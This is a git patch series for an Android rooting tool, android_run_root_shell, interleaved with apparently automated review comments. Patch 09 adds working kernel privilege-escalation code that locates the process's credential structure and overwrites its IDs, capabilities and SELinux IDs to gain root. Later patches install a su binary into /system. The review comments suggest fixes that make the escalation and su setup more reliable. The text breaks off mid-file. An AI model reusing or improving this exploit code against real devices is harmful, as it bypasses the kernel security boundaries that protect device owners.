From d04d55735651583b5d2ec750314ed84dc03462e4 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Mon, 10 Mar 2014 18:14:04 +0900 Subject: [PATCH 01/26] update subprojects --- .gitmodules | 2 +- device_database | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/.gitmodules b/.gitmodules index c257cea..29178e0 100644 --- a/.gitmodules +++ b/.gitmodules @@ -3,7 +3,7 @@ url = git://github.com/android-rooting-tools/libdiagexploit.git [submodule "device_database"] path = device_database - url = git://github.com/android-rooting-tools/android_device_database.git + url = https://github.com/scoty755/android_device_database.git [submodule "libperf_event_exploit"] path = libperf_event_exploit url = git://github.com/android-rooting-tools/libperf_event_exploit.git diff --git a/device_database b/device_database index 0710f26..90b70ce 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 0710f266b7969a70d70a534a199205babbe90493 +Subproject commit 90b70ce0eaf5ce993e347d1e11b25025f542743d From 2f8ce84c21489dd23957969d94f208f40436aa1d Mon Sep 17 00:00:00 2001 From: scoty755 Date: Tue, 11 Mar 2014 18:42:47 +0900 Subject: [PATCH 02/26] update subprojects --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 90b70ce..5a6ecd5 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 90b70ce0eaf5ce993e347d1e11b25025f542743d +Subproject commit 5a6ecd515bf61bf7eb79a244d3a54d195db3c1d3 From 4fd9163afdd4d0a05801d9d2bd417fed5ab59420 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Wed, 16 Apr 2014 04:43:50 +0900 Subject: [PATCH 03/26] update subprojects --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 5a6ecd5..9313fa6 160000 --- a/device_database +++ b/device_database 
@@ -1 +1 @@ -Subproject commit 5a6ecd515bf61bf7eb79a244d3a54d195db3c1d3 +Subproject commit 9313fa6af99bef335b39aadab0c271ce7fd40ca1 From bc9670de7da3b9627a7197415f8972c500115072 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 20 Apr 2014 20:32:34 +0900 Subject: [PATCH 04/26] update subprojects --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 9313fa6..79245f9 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 9313fa6af99bef335b39aadab0c271ce7fd40ca1 +Subproject commit 79245f93d86cf629f032c2d3161d39edfac9a781 From 455ecae1cf80286fce231aa8dcb8cdc7d85fc6f2 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Fri, 16 May 2014 00:26:31 +0900 Subject: [PATCH 05/26] update subprojects --- device_database | 2 +- libexploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 79245f9..2dfd89a 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 79245f93d86cf629f032c2d3161d39edfac9a781 +Subproject commit 2dfd89a5ff70802c3044b67c96539e743d7f1320 diff --git a/libexploit b/libexploit index 668780f..6856cf2 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 668780f94d953d1fab30dec8d98722017becdf8d +Subproject commit 6856cf2dbee7b1da9c2c148729ce393625fff515 From cc597838a4dddc8313414ef9277348be7ee16698 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Fri, 16 May 2014 00:54:59 +0900 Subject: [PATCH 06/26] Change the module:libexploit --- .gitmodules | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitmodules b/.gitmodules index 29178e0..a2a6396 100644 --- a/.gitmodules +++ b/.gitmodules 
@@ -21,7 +21,7 @@ url = https://github.com/android-rooting-tools/libfb_mem_exploit.git [submodule "libexploit"] path = libexploit - url = https://github.com/android-rooting-tools/libexploit.git + url = git@github.com:scoty755/libexploit.git [submodule "libmsm_cameraconfig_exploit"] path = libmsm_cameraconfig_exploit url = git://github.com/fi01/libmsm_cameraconfig_exploit.git From cb3dcd477cb562ed09abfc714395e9292265e484 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Thu, 22 May 2014 18:40:34 +0900 Subject: [PATCH 07/26] update README.md --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index e59b0fe..0463a05 100644 --- a/README.md +++ b/README.md @@ -13,7 +13,7 @@ Building `export PATH=ANDK_DIR:$PATH` * In another directory clone this repo: - `git clone --recursive https://github.com/android-rooting-tools/android_run_root_shell` + `git clone --recursive https://github.com/scoty755/android_run_root_shell.git` * Change to the directory where the repo was cloned `cd android_run_root_shell` @@ -22,7 +22,7 @@ Building `ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk` * If all goes well you will get the compiled binary at: - `./libs/armeabi/run_root_shell` + `./libs/armeabi/run_root_shell` and `./device_database/device.db` Running @@ -41,10 +41,10 @@ Running `sudo adb start-server` * Transfer run_root_shell to a temporary directory on the phone: - `adb push run_root_shell /data/local` + `adb push run_root_shell /data/local/tmp` and `adb push device.db /data/local/tmp` * Ensure that run_root_shell has execute permissions: - `adb shell chmod 777 /data/local/run_root_shell` + `adb shell chmod 777 /data/local/tmp/*` * Run the command on the phone: - `adb shell /data/local/run_root_shell` + `adb shell /data/local/tmp/run_root_shell` From 6f850026c0e242d6011006a350be94678641d943 Mon Sep 17 00:00:00 2001 
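Review bot: The new `libexploit` URL `git@github.com:scoty755/libexploit.git` is an SSH remote, so `git clone --recursive` fails on this submodule for anyone without a GitHub SSH key — including users following the README in this same series, which clones over HTTPS — while every other submodule in the file stays on `https://` or `git://`. Use `url = https://github.com/scoty755/libexploit.git` (PATCH 11 later in the series makes exactly that change). Separately, this commit and PATCH 01 repoint exploit-code submodules from the `android-rooting-tools` organisation to a personal fork; the gitlink still pins a commit hash, but anyone building this tree is now trusting that fork's history, which deserves a sentence in the commit message.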
From: Hiroyuki Ikezoe Date: Sun, 4 May 2014 06:47:39 +0900 Subject: [PATCH 08/26] Expand tab. --- mm.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/mm.c b/mm.c index 44419f6..ab913fd 100644 --- a/mm.c +++ b/mm.c @@ -220,7 +220,7 @@ run_with_mmap(memory_callback_t callback) return attempt_exploit(ptmx_fops_fsync_address, (unsigned long int)&setup_mmap_by_fsync, 0, - run_callback_with_fsync_and_mmap, callback); + run_callback_with_fsync_and_mmap, callback); } static bool From 4879632b998fbebf83ebe4581b81d05315b98622 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 18 Sep 2014 00:15:02 +0900 Subject: [PATCH 09/26] Try to modify in struct cred directly when commit_creds() is failed. --- main.c | 174 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 173 insertions(+), 1 deletion(-) diff --git a/main.c b/main.c index 60f5cc0..0375271 100644 --- a/main.c +++ b/main.c 
@@ -18,10 +18,171 @@ #include "libexploit/exploit.h" #include "libkallsyms/kallsyms_in_memory.h" +#define THREAD_SIZE 8192 + +#define KERNEL_START 0xc0000000 + +struct thread_info; +struct task_struct; +struct cred; +struct kernel_cap_struct; +struct task_security_struct; +struct list_head; + +struct thread_info { + unsigned long flags; + int preempt_count; + unsigned long addr_limit; + struct task_struct *task; + + /* ... */ +}; + +struct kernel_cap_struct { + unsigned long cap[2]; +}; + +struct cred { + unsigned long usage; + uid_t uid; + gid_t gid; + uid_t suid; + gid_t sgid; + uid_t euid; + gid_t egid; + uid_t fsuid; + gid_t fsgid; + unsigned long securebits; + struct kernel_cap_struct cap_inheritable; + struct kernel_cap_struct cap_permitted; + struct kernel_cap_struct cap_effective; + struct kernel_cap_struct cap_bset; + unsigned char jit_keyring; + void *thread_keyring; + void *request_key_auth; + void *tgcred; + struct task_security_struct *security; + + /* ... */ +}; + +struct list_head { + struct list_head *next; + struct list_head *prev; +}; + +struct task_security_struct { + unsigned long osid; + unsigned long sid; + unsigned long exec_sid; + unsigned long create_sid; + unsigned long keycreate_sid; + unsigned long sockcreate_sid; +}; + + +struct task_struct_partial { + struct list_head cpu_timers[3]; + struct cred *real_cred; + struct cred *cred; + struct cred *replacement_session_keyring; + char comm[16]; +}; + +static inline struct thread_info * +current_thread_info(void) +{ + register unsigned long sp asm ("sp"); + return (struct thread_info *)(sp & ~(THREAD_SIZE - 1)); +} + +static bool +is_cpu_timer_valid(struct list_head *cpu_timer) +{ + if (cpu_timer->next != cpu_timer->prev) { + return false; + } + + if ((unsigned long int)cpu_timer->next < KERNEL_START) { + return false; + } + + return true; +} + +static void +obtain_root_privilege_by_modify_task_cred(void) +{ + struct thread_info *info; + struct cred *cred; + struct task_security_struct 
*security; + int i; + + info = current_thread_info(); + cred = NULL; + + for (i = 0; i < 0x400; i+= 4) { + struct task_struct_partial *task = ((void *)info->task) + i; + + if (is_cpu_timer_valid(&task->cpu_timers[0]) + && is_cpu_timer_valid(&task->cpu_timers[1]) + && is_cpu_timer_valid(&task->cpu_timers[2]) + && task->real_cred == task->cred) { + cred = task->cred; + break; + } + } + + if (cred == NULL) { + return; + } + + cred->uid = 0; + cred->gid = 0; + cred->suid = 0; + cred->sgid = 0; + cred->euid = 0; + cred->egid = 0; + cred->fsuid = 0; + cred->fsgid = 0; + + cred->cap_inheritable.cap[0] = 0xffffffff; + cred->cap_inheritable.cap[1] = 0xffffffff; + cred->cap_permitted.cap[0] = 0xffffffff; + cred->cap_permitted.cap[1] = 0xffffffff; + cred->cap_effective.cap[0] = 0xffffffff; + cred->cap_effective.cap[1] = 0xffffffff; + cred->cap_bset.cap[0] = 0xffffffff; + cred->cap_bset.cap[1] = 0xffffffff; + + security = cred->security; + if (security) { + if (security->osid != 0 + && security->sid != 0 + && security->exec_sid == 0 + && security->create_sid == 0 + && security->keycreate_sid == 0 + && security->sockcreate_sid == 0) { + security->osid = 1; + security->sid = 1; + } + } +} + +static void +obtain_root_privilege_by_commit_creds(void) +{ + commit_creds(prepare_kernel_cred(0)); +} + +static void (*obtain_root_privilege_func)(void); + void obtain_root_privilege(void) { - commit_creds(prepare_kernel_cred(0)); + if (obtain_root_privilege_func) { + obtain_root_privilege_func(); + } } static bool @@ -30,8 +191,19 @@ run_obtain_root_privilege(void *user_data) int fd; int ret; + obtain_root_privilege_func = obtain_root_privilege_by_commit_creds; + fd = open(PTMX_DEVICE, O_WRONLY); + ret = fsync(fd); + + if (getuid() != 0) { + printf("commit_creds(): failed. Try to hack task->cred.\n"); + + obtain_root_privilege_func = obtain_root_privilege_by_modify_task_cred; + ret = fsync(fd); + } + close(fd); return (ret == 0); 
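Review bot: `obtain_root_privilege_by_modify_task_cred()` writes through a `cred` pointer recovered by a layout heuristic — three empty `list_head`s followed by `real_cred == cred` somewhere in the first 0x400 bytes of the task — and then stores into it without checking that the pointer is a kernel address, even though `is_cpu_timer_valid()` applies exactly that check to the list pointers; add `if ((unsigned long)cred < KERNEL_START) return;` before `cred->uid = 0;`. The `struct thread_info` / `struct cred` definitions, `THREAD_SIZE 8192` and `KERNEL_START 0xc0000000` encode one 32-bit ARM kernel ABI (plain `uid_t` fields, no debug-credentials magic, 8K stacks, 3G/1G split); on a kernel with a different layout the stores land on unrelated fields, so a comment above the structs such as `/* Layouts assume 32-bit ARM kernels with plain uid_t in struct cred; verify against the target kernel before extending. */` would warn the next maintainer. `0x400` and the SELinux SID value `1` written to `osid`/`sid` are magic numbers; naming them (`TASK_SCAN_BYTES`, and the kernel SID constant — confirm that `1` is the SID intended) makes the intent explicit.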
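Review bot: After the fallback, `run_obtain_root_privilege()` still returns `ret == 0`, i.e. whether the second `fsync()` succeeded, not whether the process became root, so the caller sees success even when both `commit_creds` and the cred-patching path left the uid unchanged. Return `(ret == 0 && getuid() == 0);` instead, which is the condition the fallback itself keys on. The context line `fd = open(PTMX_DEVICE, O_WRONLY);` is never checked either, so both `fsync(fd)` calls run on -1 when the open fails; `if (fd < 0) return false;` before the first `fsync` closes that. The function's opening lines are outside the hunk.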
From 7d446d8a3107cb23fc21aacbd6420df95c4b82a2 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 1 Feb 2015 08:55:03 +0900 Subject: [PATCH 10/26] Minor cleaning --- .gitmodules.BACKUP.6814.gitmodules | 38 ------------------------- .gitmodules.BASE.6814.gitmodules | 36 ----------------------- .gitmodules.BASE.6814.gitmodules.swp | Bin 12288 -> 0 bytes .gitmodules.LOCAL.6814.gitmodules | 36 ----------------------- .gitmodules.LOCAL.6814.gitmodules.swp | Bin 12288 -> 0 bytes .gitmodules.REMOTE.6814.gitmodules | 9 ------ .gitmodules.REMOTE.6814.gitmodules.swp | Bin 12288 -> 0 bytes .gitmodules.swp | Bin 12288 -> 0 bytes libdiagexploit | 1 - libfb_mem_exploit | 1 - libfj_hdcp_exploit | 1 - libget_user_exploit | 1 - libmsm_acdb_exploit | 1 - libmsm_cameraconfig_exploit | 1 - libperf_event_exploit | 1 - libput_user_exploit | 1 - libsqlite | 1 - 17 files changed, 128 deletions(-) delete mode 100644 .gitmodules.BACKUP.6814.gitmodules delete mode 100644 .gitmodules.BASE.6814.gitmodules delete mode 100644 .gitmodules.BASE.6814.gitmodules.swp delete mode 100644 .gitmodules.LOCAL.6814.gitmodules delete mode 100644 .gitmodules.LOCAL.6814.gitmodules.swp delete mode 100644 .gitmodules.REMOTE.6814.gitmodules delete mode 100644 .gitmodules.REMOTE.6814.gitmodules.swp delete mode 100644 .gitmodules.swp delete mode 160000 libdiagexploit delete mode 160000 libfb_mem_exploit delete mode 160000 libfj_hdcp_exploit delete mode 160000 libget_user_exploit delete mode 160000 libmsm_acdb_exploit delete mode 160000 libmsm_cameraconfig_exploit delete mode 160000 libperf_event_exploit delete mode 160000 libput_user_exploit delete mode 160000 libsqlite diff --git a/.gitmodules.BACKUP.6814.gitmodules b/.gitmodules.BACKUP.6814.gitmodules deleted file mode 100644 index 6b3e877..0000000 --- a/.gitmodules.BACKUP.6814.gitmodules +++ /dev/null 
@@ -1,38 +0,0 @@ -[submodule "device_database"] - path = device_database -<<<<<<< HEAD - url = https://github.com/scoty755/android_device_database.git -[submodule "libperf_event_exploit"] - path = libperf_event_exploit - url = git://github.com/android-rooting-tools/libperf_event_exploit.git -[submodule "libmsm_acdb_exploit"] - path = libmsm_acdb_exploit - url = git://github.com/fi01/libmsm_acdb_exploit.git -[submodule "libfj_hdcp_exploit"] - path = libfj_hdcp_exploit - url = git://github.com/fi01/libfj_hdcp_exploit.git -======= - url = git://github.com/android-rooting-tools/android_device_database.git ->>>>>>> fetch -[submodule "libkallsyms"] - path = libkallsyms - url = https://github.com/android-rooting-tools/libkallsyms.git -[submodule "libexploit"] - path = libexploit -<<<<<<< HEAD - url = git@github.com:scoty755/libexploit.git -[submodule "libmsm_cameraconfig_exploit"] - path = libmsm_cameraconfig_exploit - url = git://github.com/fi01/libmsm_cameraconfig_exploit.git -[submodule "libput_user_exploit"] - path = libput_user_exploit - url = https://github.com/fi01/libput_user_exploit.git -[submodule "libget_user_exploit"] - path = libget_user_exploit - url = https://github.com/fi01/libget_user_exploit.git -[submodule "libsqlite"] - path = libsqlite - url = https://github.com/android-rooting-tools/android_libsqlite.git -======= - url = https://github.com/android-rooting-tools/libexploit.git ->>>>>>> fetch diff --git a/.gitmodules.BASE.6814.gitmodules b/.gitmodules.BASE.6814.gitmodules deleted file mode 100644 index c257cea..0000000 --- a/.gitmodules.BASE.6814.gitmodules +++ /dev/null 
@@ -1,36 +0,0 @@ -[submodule "libdiagexploit"] - path = libdiagexploit - url = git://github.com/android-rooting-tools/libdiagexploit.git -[submodule "device_database"] - path = device_database - url = git://github.com/android-rooting-tools/android_device_database.git -[submodule "libperf_event_exploit"] - path = libperf_event_exploit - url = git://github.com/android-rooting-tools/libperf_event_exploit.git -[submodule "libmsm_acdb_exploit"] - path = libmsm_acdb_exploit - url = git://github.com/fi01/libmsm_acdb_exploit.git -[submodule "libfj_hdcp_exploit"] - path = libfj_hdcp_exploit - url = git://github.com/fi01/libfj_hdcp_exploit.git -[submodule "libkallsyms"] - path = libkallsyms - url = https://github.com/android-rooting-tools/libkallsyms.git -[submodule "libfb_mem_exploit"] - path = libfb_mem_exploit - url = https://github.com/android-rooting-tools/libfb_mem_exploit.git -[submodule "libexploit"] - path = libexploit - url = https://github.com/android-rooting-tools/libexploit.git -[submodule "libmsm_cameraconfig_exploit"] - path = libmsm_cameraconfig_exploit - url = git://github.com/fi01/libmsm_cameraconfig_exploit.git -[submodule "libput_user_exploit"] - path = libput_user_exploit - url = https://github.com/fi01/libput_user_exploit.git -[submodule "libget_user_exploit"] - path = libget_user_exploit - url = https://github.com/fi01/libget_user_exploit.git -[submodule "libsqlite"] - path = libsqlite - url = https://github.com/android-rooting-tools/android_libsqlite.git 
diff --git a/.gitmodules.BASE.6814.gitmodules.swp b/.gitmodules.BASE.6814.gitmodules.swp deleted file mode 100644 index f95c3ac4dc6d1da916b02900b7804a479bd47188..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12288 zcmeI2F>ljA6vtm!P$(@GY_NosHFiQNMMw-SWMJq7WkKjT+n2=T>@&V|p%MZib>joT z#K_FRfcOSTAR#7pkPrhatUQOfsjqTLI{|u@{<8euyZqn%>{yEOy!MT&YmH@R5%8D? z7>4h!fBST=_T?mi_LbSp<9|3tb*)&n*0{f_)UdS@rjArTm*s^IM}_VcM>BfoU>sFpFi2xBG0z`la5CI}U1c(3;_@4=wqy~?0gNMeOJTpGm ztn>JiPDFqR5CI}U1c(3;AOb{y2oM1xKm>@uKS+QF0I%u*w~t`+`2TdRa0B=yw zP!CXD)B@@->I3%k8ubE|_r_3k5CI}U1c(3;AOb{y2>ks7>RBoqml^|O5`EFlCq4(6 z=lCirraW8u$Y&V$TSh6Vizt(!r|-(phIpXk{Fv=1+|-%(dlSPHLA75m zY^^o^?7NduPE2Y}R- znT?%|jTt0{3b8Q3gqWBZc@B1*yWkSB6+KIzEWh`h@7?blOHrQNzI$`6(X|!{9LES5 z2Ji2D`}DB(^%Nn}6KX4q|K%9fwIb14quwDztA1FAZ6wq}>mc zldxFWqeORU$w`DzHjVs51iq7`(J0`^0pr}Zpga_Q%9*rQZ(m_Y<7C*(t&kjDq1dHDao`2GLoC?W4a z&p;t)9drWp;|L+Upy!|s&@IqO(9bzSK7(F?c0k*pOQ6%B8tBboLSBM)Koryk&4WH3 zBIGsb1&D&KfEGaCp`TsQTTs^9HV6+SfCP{L5xs(tNIpxanEMOSj4`?QJ*%--|2Prl(CK$CU(p&-BL<&rQ0WjlIvj6}9 diff --git a/.gitmodules.REMOTE.6814.gitmodules b/.gitmodules.REMOTE.6814.gitmodules deleted file mode 100644 index d56e434..0000000 --- a/.gitmodules.REMOTE.6814.gitmodules +++ /dev/null @@ -1,9 +0,0 @@ -[submodule "device_database"] - path = device_database - url = git://github.com/android-rooting-tools/android_device_database.git -[submodule "libkallsyms"] - path = libkallsyms - url = https://github.com/android-rooting-tools/libkallsyms.git -[submodule "libexploit"] - path = libexploit - url = https://github.com/android-rooting-tools/libexploit.git 
diff --git a/.gitmodules.REMOTE.6814.gitmodules.swp b/.gitmodules.REMOTE.6814.gitmodules.swp deleted file mode 100644 index 87fd10ef12afd581bd0addf331ccba61b8ba137e..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12288 zcmeI&Jxjwt7zgmHTL)jLn^UZFlGa))f`eiQha!~fA`&hyHldeX$X(Pf>Zj4~BDgz? zxcCX&ywrx8EQ+`&|AU9)p1b48{kGD_ZX6%~TKQcZ0-W+@Y*^@oI9=+~-ajdXW_7FpyT_#oU~1blPnz;ar+DauXi7 zR+2`Oge82BG1E}TL++-`6Gp$=I~;V4&8_Cfr*yF#RuF(dL13P=)|-tiwN_u%mTO0a zT`V8~0SG_<0uX=z1Rwx`|1BWn3b|HKoSQzgI-M(}dAh^|0SG_<0uX=z1Rwwb2tWV= z5P-lR6re64!v#X_RAm4E=fD4-774jmaiii)MPEft#hW_!GChBr-NAqW1Rwwb2tWV= z5P$##AOHaf{GLEHO_;W$`BKJW+sqor{nR!b9_G#Bde%7}L_=M2&V88G1`sl5`x3jcbH;ZrbSXmY ztZYc|7XSkT5@JVUVPfcn7?@x|V&yrp^WzeScBFbIeP#LH^SyVUdpAURcK!CX4P&Xc z062~VwEfRFe|&vd`hFTfIznxy^ZyuKziLNRH<)u-h<0_=k86Q&STOqGPS?>~6HXHH zj*@1}S60j;VRj8mi;Gq)gfdyjjfL-8ank8dSkmJ`VAjw*6mAl5Il3;r5dk8w7Xq`e zaACfldY-MEG3HL*+RI1eLj;Hb5g-CYfCvx)B0vO)zyTqkq7ppDy&TH+b1r+9v}g88 z4_au{E6TPypSohtlnP3K}KTgX(rY zsBRwwMcAXqlkYQ>q2;iU$IKC(rr#>sZ;_v#LXqD{DwhUzvYhuC>!q>M8^+c3)ioFb zpPh#uH=7=W*-uHfSrEwWQ0i5b&+EbRd5kvkI*ifI>Q%c8c@?{S%XhftGR15rd$p|H zjIkB-^J{Kep6f(K$EKO}jcDcpy~23u`7+0~ivsF)J)&-(5^^#$yqgh^n-<@~p7o+E f#y#{r#ytj^Oemdxl} Date: Sun, 1 Feb 2015 09:03:55 +0900 Subject: [PATCH 11/26] libexploit: Change the referenced sub-module --- .gitmodules | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitmodules b/.gitmodules index d56e434..d55c766 100644 --- a/.gitmodules +++ b/.gitmodules @@ -6,4 +6,4 @@ url = https://github.com/android-rooting-tools/libkallsyms.git [submodule "libexploit"] path = libexploit - url = https://github.com/android-rooting-tools/libexploit.git + url = https://github.com/scoty755/libexploit.git From 84383e17d5162743b61606e847d865cd3055d101 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 1 Feb 2015 09:29:06 +0900 Subject: [PATCH 12/26] Update submodule --- libexploit | 2 +- libkallsyms | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/libexploit b/libexploit index 6856cf2..c103019 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 6856cf2dbee7b1da9c2c148729ce393625fff515 +Subproject commit c103019dc5d35c718882c35a0249af92de1b9d6c diff --git a/libkallsyms b/libkallsyms index 4e8d619..e0072f6 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit 4e8d619dd4be4fecf5eb6ea36d6d2fd14e6c32a0 +Subproject commit e0072f6130f27be502bc8b7e5de639e4d0cc3b7c From a6d6c496902635fa630fcdaab038f0920b4079c1 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 1 Feb 2015 09:51:07 +0900 Subject: [PATCH 13/26] device_database: Change the referenced sub-module --- .gitmodules | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitmodules b/.gitmodules index d55c766..0c5332b 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,6 +1,6 @@ [submodule "device_database"] path = device_database - url = git://github.com/android-rooting-tools/android_device_database.git + url = https://github.com/scoty755/android_device_database.git [submodule "libkallsyms"] path = libkallsyms url = https://github.com/android-rooting-tools/libkallsyms.git From 63da2b646ff4e0b9a226bf214dc5d86effeca25d Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 1 Feb 2015 09:53:40 +0900 Subject: [PATCH 14/26] Update submodule --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 2dfd89a..ae49e23 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 2dfd89a5ff70802c3044b67c96539e743d7f1320 +Subproject commit ae49e23595d3adc8aaf588f1e3117ba5099b527d From c5e53f0c7ead39db5de3f49e879f2497818d1e1d Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 1 Feb 2015 17:11:35 +0900 Subject: [PATCH 15/26] Update submodule --- libexploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libexploit b/libexploit index c103019..a2b6436 160000 --- a/libexploit +++ b/libexploit 
@@ -1 +1 @@ -Subproject commit c103019dc5d35c718882c35a0249af92de1b9d6c +Subproject commit a2b6436aad1fd10da96f91dc1668dc87f159b998 From 02c47631f3871d1021aaf629475939a5fc791161 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Thu, 12 Feb 2015 20:38:47 +0900 Subject: [PATCH 16/26] Update submodule --- libexploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libexploit b/libexploit index a2b6436..7f1c97f 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit a2b6436aad1fd10da96f91dc1668dc87f159b998 +Subproject commit 7f1c97fa1f85b5a7678fc81ad6f0f81a8322a031 From cb77b9c8cd11c320029968ec47009be351e1f1b7 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Fri, 13 Feb 2015 23:04:37 +0900 Subject: [PATCH 17/26] Add the installation function of su binary --- main.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/main.c b/main.c index 0375271..79ac8a4 100644 --- a/main.c +++ b/main.c @@ -17,6 +17,7 @@ #include "ptmx.h" #include "libexploit/exploit.h" #include "libkallsyms/kallsyms_in_memory.h" +#include #define THREAD_SIZE 8192 @@ -376,6 +377,12 @@ main(int argc, char **argv) } else { execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); } + + if ((fopen("/data/local/tmp/su", "r")) != NULL){ + system("mount -o rw,remount /system"); + system("cp /data/local/tmp/su /system/xbin"); + system("mount -o ro,remount /system"); + } exit(EXIT_SUCCESS); } From 8ea5b5f1f6d8f5ff737baed8089c159bd9669339 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Mon, 16 Feb 2015 00:20:26 +0900 Subject: [PATCH 18/26] Grant permission to su binary --- main.c | 1 + 1 file changed, 1 insertion(+) diff --git a/main.c b/main.c index 79ac8a4..baab536 100644 --- a/main.c +++ b/main.c @@ -381,6 +381,7 @@ main(int argc, char **argv) if ((fopen("/data/local/tmp/su", "r")) != NULL){ system("mount -o rw,remount /system"); system("cp /data/local/tmp/su /system/xbin"); + system("chmod 644 /system/xbin/su"); system("mount -o ro,remount /system"); } 
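Review bot: The su-installation block is placed after the `if`/`else` whose visible `else` branch calls `execl("/system/bin/sh", ...)`; `execl` only returns on failure, so on the normal path the process image is replaced and `/data/local/tmp/su` is never installed (the `if` branch is outside the hunk; if it also execs, the block is unreachable on every success path). The `fopen()` handle is also leaked, neither the `rw` remount nor the `cp` is checked, and `/system` is remounted read-only even when the copy failed. Note too that `/data/local/tmp` is writable by the shell user, so whatever is staged there is copied verbatim into `/system/xbin` as root with no check of its origin — by design for a rooting tool, but worth a comment at the site. Moving the block ahead of the exec and checking results addresses the rest:

```c
  /* … unchanged: command/argument handling … */
  /* Install a staged su before exec'ing the shell: exec replaces this
   * process, so code placed after it only runs when the exec fails. */
  FILE *su = fopen("/data/local/tmp/su", "r");
  if (su != NULL) {
    fclose(su);
    if (system("mount -o rw,remount /system") != 0) {
      fprintf(stderr, "Failed to remount /system read-write.\n");
    } else {
      if (system("cp /data/local/tmp/su /system/xbin/su") != 0) {
        fprintf(stderr, "Failed to copy su into /system/xbin.\n");
      }
      system("mount -o ro,remount /system");
    }
  }
  /* … unchanged: if/else that exec()s the shell … */
  exit(EXIT_SUCCESS);
```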
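Review bot: `chmod 644 /system/xbin/su` leaves the copied binary without any execute bit, so `su` cannot be run at all; a su binary needs at least `0755`, and the ones commonly shipped with rooting tools rely on the setuid bit (`06755`) to elevate — check what the staged binary expects. Change the line to `system("chmod 06755 /system/xbin/su");` (or `0755` if the binary elevates some other way). The return value of this `system()` call, like its neighbours, is unchecked, so a failed chmod is silently followed by the read-only remount; `if (system("chmod 06755 /system/xbin/su") != 0) fprintf(stderr, "chmod su failed\n");` keeps the failure visible.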
From d21884ff876d1c0ecf31c49822a1728eccd133e1 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sat, 4 Jul 2015 12:45:10 +0900 Subject: [PATCH 19/26] Merge function of get_essential_address --- Android.mk | 2 + get_address.c | 226 ++++++++++++++++++++++++++++++ get_root.c | 380 +++++++++++++++++++++++++++++++++++++++++++++++++ main.c | 381 +++----------------------------------------------- 4 files changed, 629 insertions(+), 360 deletions(-) create mode 100644 get_address.c create mode 100644 get_root.c diff --git a/Android.mk b/Android.mk index 9a4970f..8c474f7 100644 --- a/Android.mk +++ b/Android.mk @@ -4,6 +4,8 @@ include $(CLEAR_VARS) LOCAL_SRC_FILES := \ cred.c \ + get_address.c \ + get_root.c \ kallsyms.c \ main.c \ mm.c \ diff --git a/get_address.c b/get_address.c new file mode 100644 index 0000000..7906063 --- /dev/null +++ b/get_address.c 
@@ -0,0 +1,226 @@ +#include +#include +#include +#include +#include +#include +#define _LARGEFILE64_SOURCE +#include +#include +#include +#include + +#include +#include "device_database.h" +#include "cred.h" +#include "mm.h" +#include "ptmx.h" +#include "libexploit/exploit.h" +#include "libkallsyms/kallsyms_in_memory.h" + +static void *vmalloc_exec; + +static bool +has_all_essential_addresses(void) +{ + if (prepare_kernel_cred + && commit_creds + && remap_pfn_range + && vmalloc_exec + && ptmx_fops) { + return true; + } + + return false; +} + +bool +setup_vmalloc_exec_address(void) +{ + if (vmalloc_exec) { + return true; + } + + vmalloc_exec = (void *)device_get_symbol_address(DEVICE_SYMBOL(vmalloc_exec)); + + if (!vmalloc_exec && kallsyms_exist()) { + vmalloc_exec = (void *)kallsyms_get_symbol_address("vmalloc_exec"); + } + + return !!vmalloc_exec; +} + +static bool +find_ptmx_fops_address(kallsyms *info, void *mem, size_t length) +{ + find_ptmx_fops_hint_t hint; + + hint.ptmx_open_address = 